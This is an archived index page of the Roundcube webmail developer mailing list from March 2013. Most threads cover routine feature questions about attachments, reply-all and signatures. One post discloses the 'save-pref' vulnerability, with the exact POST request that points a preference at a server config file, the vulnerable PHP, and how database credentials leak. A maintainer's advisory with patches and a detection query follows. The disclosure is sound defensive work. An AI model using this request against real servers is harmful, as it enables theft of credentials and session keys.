Dev

dev@lists.roundcube.net

4290 discussions

Security updates 0.8.6 and 0.7.3 for save-pref vulnerability
by Thomas Bruederli 29 Mar '13

29 Mar '13

After getting reports about a possible vulnerability of Roundcube which allows an attacker to modify its users preferences in a way that he/she can then read files from the server, we now published updated packages as well as patches that fix this security issue. Please update all your Roundcube installations with the new versions (0.9-rc2, 0.8.6, 0.7.4) or patch them with the published patches. Download the latest version from http://roundcube.net/download Patch for 0.9.x: http://ow.ly/jtQD0 Patch for 0.8.x: http://ow.ly/jtQHM Patch for 0.7.x: http://ow.ly/jtQK0 Patch for 0.6: http://ow.ly/jtQNd In order to find out whether one of your users has vulnerable preferences, you can run the following query on the Roundcube user database: SELECT * FROM users WHERE preferences LIKE '%generic_message_footer%' If this returns any results, you should at least clear the 'preferences' field of that user entry. Or better: entirely block the user because he or she most likely tried to exploit your system. And here's some background about the vulnerability: http://lists.roundcube.net/pipermail/dev/2013-March/022328.html Best regards, Thomas

5 12

zero day vulnerability (tested on v8.0 to 9.0)
by Sergey Sidlyarenko 28 Mar '13

28 Mar '13

Hacker first change value in user preference generic_message_footer to any file allowed to read roundcube (config/db.inc.php config/main.inc.php), after send herself message (with included config file). This allow view session crypto key, and db user and password. If at hosting installed phpmyadmin (mysql) or pgmyadmin (pgsql) and session saved in db, hacker get user mail login and password. Finded in Russian tech blog (http://habrahabr.ru/post/174423/). ------ POST /?_task=settings&_action=save-pref&check_request=&_check_request= HTTP/1.1" 200 1133 "http://mail.ddos-guard.net/?_task=mail" "Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0" "_token=0f7c9ae8a387cb0bc5ce563fa09fe172&_session=generic_message_footer&_name=generic_message_footer&_value=config/db.inc.php ------ index.php: else if ($RCMAIL->action == 'save-pref') { include INSTALL_PATH . 'program/steps/utils/save_pref.inc'; } ------ program/steps/utils/save_pref.inc: $name = get_input_value('_name', RCUBE_INPUT_POST); $value = get_input_value('_value', RCUBE_INPUT_POST); // save preference value $RCMAIL->user->save_prefs(array($name => $value)); //<--------- rewrite value // update also session if requested if ($sessname = get_input_value('_session', RCUBE_INPUT_POST)) { // Support multidimensional arrays... $vars = explode('/', $sessname); // ... up to 3 levels if (count($vars) == 1) $_SESSION[$vars[0]] = $value; else if (count($vars) == 2) $_SESSION[$vars[0]][$vars[1]] = $value; else if (count($vars) == 3) $_SESSION[$vars[0]][$vars[1]][$vars[2]] = $value; } $OUTPUT->reset(); $OUTPUT->send(); ------ program/steps/mail/sendmail.inc // generic footer for all messages if ($isHtml && !empty($CONFIG['generic_message_footer_html'])) { $footer = file_get_contents(realpath($CONFIG['generic_message_footer_html'])); //<----- load file from value path $footer = rcube_charset_convert($footer, RCMAIL_CHARSET, $message_charset); } else if (!empty($CONFIG['generic_message_footer'])) { $footer = file_get_contents(realpath($CONFIG['generic_message_footer'])); //<----- load file from value path $footer = rcube_charset_convert($footer, RCMAIL_CHARSET, $message_charset); if ($isHtml) $footer = '<pre>'.$footer.'</pre>'; } -- Sidlyarenko Sergey https://github.com/lefoyer

6 10

mis-typed attachment handling
by Kelsey Cummings 27 Mar '13

27 Mar '13

We getting ready to role out roundcube for our webmail platform and our testing ran into one issue so far that seems like a good idea to push upstream. I searched but didn't find any mention of this so please pardon in advance if this has already been discussed. One of our testers had an email with a pdf attachment that had a mime type of text/plain. Roundcube displays the pdf as text. We tested a few other clients and it looks like recent version of outlook and apple mail display the attachment as a pdf but thunderbird displays it as plain text so there isn't unanimous that a mail client should handle this either way. What is roundcubes opinion on attachments with incorrect mime types? There's a pretty good argument that a end user doesn't really care that whoever sent them an attachment used broken software to do it, particularly if they use another client that displays it correctly. -- Kelsey Cummings - kgc(a)corp.sonic.net sonic.net, inc. System Architect 2260 Apollo Way 707.522.1000 Santa Rosa, CA 95407

2 2

SVN list dead?
by Michael Heydekamp 26 Mar '13

26 Mar '13

Since March 20th, I've not seen any new messages in the SVN list. Although I know and I can confirm, that there have been commits since then. Hmm?? Cheers, -- Michael Heydekamp Co-Admin freexp.de Düsseldorf/Germany

2 1

Poll: Inline attachments on attachments list
by A.L.E.C 24 Mar '13

24 Mar '13

There's a question according to http://trac.roundcube.net/ticket/1488783. There are messages with related images. Normally, they are referenced in HTML bodies (parts), but not always. So, the question is: should we list such attachments on attachments list. We have a few possibilities: 1. Do not list any in text and html mode (current situation). 2. List only unreferred in text and html mode. 3. In text mode list all, in HTML mode list unreferred only (Thunderbird's way). 4. List all in text and html mode (only for completenes, I suppose we shouldn't ever choose this option). Implementing this as a user preference will be overcomplicated, we don't want to make it optional, we should choose one. So, what's your opinion? For now I have no strong opinion, but I'm somewhere between 1. and 2. -- Aleksander 'A.L.E.C' Machniak LAN Management System Developer [http://lms.org.pl] Roundcube Webmail Developer [http://roundcube.net] --------------------------------------------------- PGP: 19359DC1 @@ GG: 2275252 @@ WWW: http://alec.pl

5 15

Top-posting and signature below the quote
by A.L.E.C 24 Mar '13

24 Mar '13

According to short discussion in http://trac.roundcube.net/ticket/1489001 I see that it is possible to set top-posting with signature below the quote. It sounds confusing and useless. Now when we have "When replying" option (reply_mode) I propose to remove "When replying or forwarding place signature" option (sig_above). Signature position should be always below the reply text (not the quote) and reply_mode already defines this position. reply_mode=0 -> reply below the quote with sig below the reply text reply_mode=1 -> reply above the quote with sig below the reply text Any objections? -- Aleksander 'A.L.E.C' Machniak LAN Management System Developer [http://lms.org.pl] Roundcube Webmail Developer [http://roundcube.net] --------------------------------------------------- PGP: 19359DC1 @@ GG: 2275252 @@ WWW: http://alec.pl

3 5

RC Logo Link
by patrick7 23 Mar '13

23 Mar '13

Hello there I have a small "feature request": Please link the logo left on the top to the startpage. ;) Regards patrick

1 0

Poll: HTML/Text switch vs. alternative part on attachments list
by A.L.E.C 23 Mar '13

23 Mar '13

So, now when we have nice HTML/Text switch (ability to toggle between html and plain text mode of message preview) we need to do something with "HTML message" attachment on attachments list. It looks redundant, or at least inconsistent. I see two solutions: 1. Don't add alternative parts to attachments list. Ie. there will be no "HTML message" on attachments list in case of a message with alternative parts. +1 from me. 2. In html mode add text part to attachments list, in text mode add html part to attachments list. -- Aleksander 'A.L.E.C' Machniak LAN Management System Developer [http://lms.org.pl] Roundcube Webmail Developer [http://roundcube.net] --------------------------------------------------- PGP: 19359DC1 @@ GG: 2275252 @@ WWW: http://alec.pl

5 4

Poll: Reply-All and Reply-To header
by A.L.E.C 23 Mar '13

23 Mar '13

You can check the behavior by clicking Reply All button (not Reply List) on this message. Example message from our mailing list contains headers: To: dev(a)lists.roundcube.net Reply-To: dev(a)lists.roundcube.net From: original(a)poster.tld So, current behavior is that you end up with one recipient dev(a)lists.roundcube.net in To field. Thunderbird for example, will add original(a)poster.tld in Cc field. So, the problem is related to Reply-To header handling. Poll: 1. Keep current behavior. 2. If To: and Reply-To: are the same and From: is different - add From: address to Cc field. I prefer current solution (1). Because I think that if Reply-To is defined a senders intention is to not receive replies to his From: address, no matter if Reply, Reply-All or Reply-List is used. I however understand that "private reply" to poster is sometimes wanted. -- Aleksander 'A.L.E.C' Machniak LAN Management System Developer [http://lms.org.pl] Roundcube Webmail Developer [http://roundcube.net] --------------------------------------------------- PGP: 19359DC1 @@ GG: 2275252 @@ WWW: http://alec.pl

7 11

Re: [RCD] Top-posting and signature below the quote
by Arne Berglund 21 Mar '13

21 Mar '13

On 03/21/2013 01:40, A.L.E.C wrote: > According to short discussion in > http://trac.roundcube.net/ticket/1489001 I see that it is possible to > set top-posting with signature below the quote. It sounds confusing > and > useless. > > Now when we have "When replying" option (reply_mode) I propose to > remove > "When replying or forwarding place signature" option (sig_above). > Signature position should be always below the reply text (not the > quote) > and reply_mode already defines this position. > > reply_mode=0 -> reply below the quote with sig below the reply text > reply_mode=1 -> reply above the quote with sig below the reply text > > Any objections? My organization (and our users) support this change 100%. Fewer useless and confusing user options is a good thing. -- Arne Berglund System Administrator, Internet Services Lane Education Service District Eugene, OR ____________

1 0

Jump to page:

2024

2023

2022

2021

2020

2019

2018

2017

2016

2015

2014

2013

2012

2011

2010

2009

2008

2007

2006

2005

Dev